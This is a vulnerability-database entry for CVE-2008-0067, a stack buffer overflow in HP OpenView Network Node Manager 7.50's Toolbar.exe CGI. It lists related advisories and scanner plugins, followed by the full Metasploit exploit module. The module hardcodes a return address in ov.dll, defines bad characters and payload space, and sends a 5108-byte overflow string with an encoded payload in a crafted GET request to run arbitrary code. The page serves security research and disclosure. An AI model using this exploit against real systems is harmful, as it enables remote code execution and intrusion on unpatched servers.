HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow

🗓️ 16 Jul 2011 04:45:21Reported by MC <[email protected]>Type

HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. An attacker can execute arbitrary code

Reporter	Title	Published	Views	Family All 32
0day.today	HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow	16 Jul 201100:00	–	zdt
Circl	CVE-2008-0067	9 May 201000:00	–	circl
Check Point Advisories	Preemptive Protection against HP OpenView Network Node Manager Buffer Overflows	9 Jan 200900:00	–	checkpoint_advisories
Check Point Advisories	HP OpenView Network Node Manager CGI programs HTTP Request Buffer Overflow (CVE-2007-6204; CVE-2008-0067)	6 Dec 200900:00	–	checkpoint_advisories
CVE	CVE-2008-0067	8 Jan 200919:00	–	cve
Cvelist	CVE-2008-0067	8 Jan 200919:00	–	cvelist
Exploit DB	HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)	9 May 201000:00	–	exploitdb
Exploit DB	HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow	16 Jul 201100:00	–	exploitdb
Tenable Nessus	HP-UX PHSS_39245 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22	15 Jun 200900:00	–	nessus
Tenable Nessus	HP-UX PHSS_39246 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22	15 Jun 200900:00	–	nessus

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
        By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
        arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-0067' ],
          [ 'OSVDB', '53222' ],
          [ 'BID', '33147' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 650,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2009-01-07'))
  end

  def exploit

    sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded

    print_status("Trying target #{target.name}...")

    send_request_raw({
      'uri'		=> "/OvCgi/Toolbar.exe?" + sploit,
      'method'	=> "GET",
      }, 5)


    handler

  end
end

02 Oct 2020 20:00Current

10High risk

Vulners AI Score10

CVSS 210

EPSS0.63419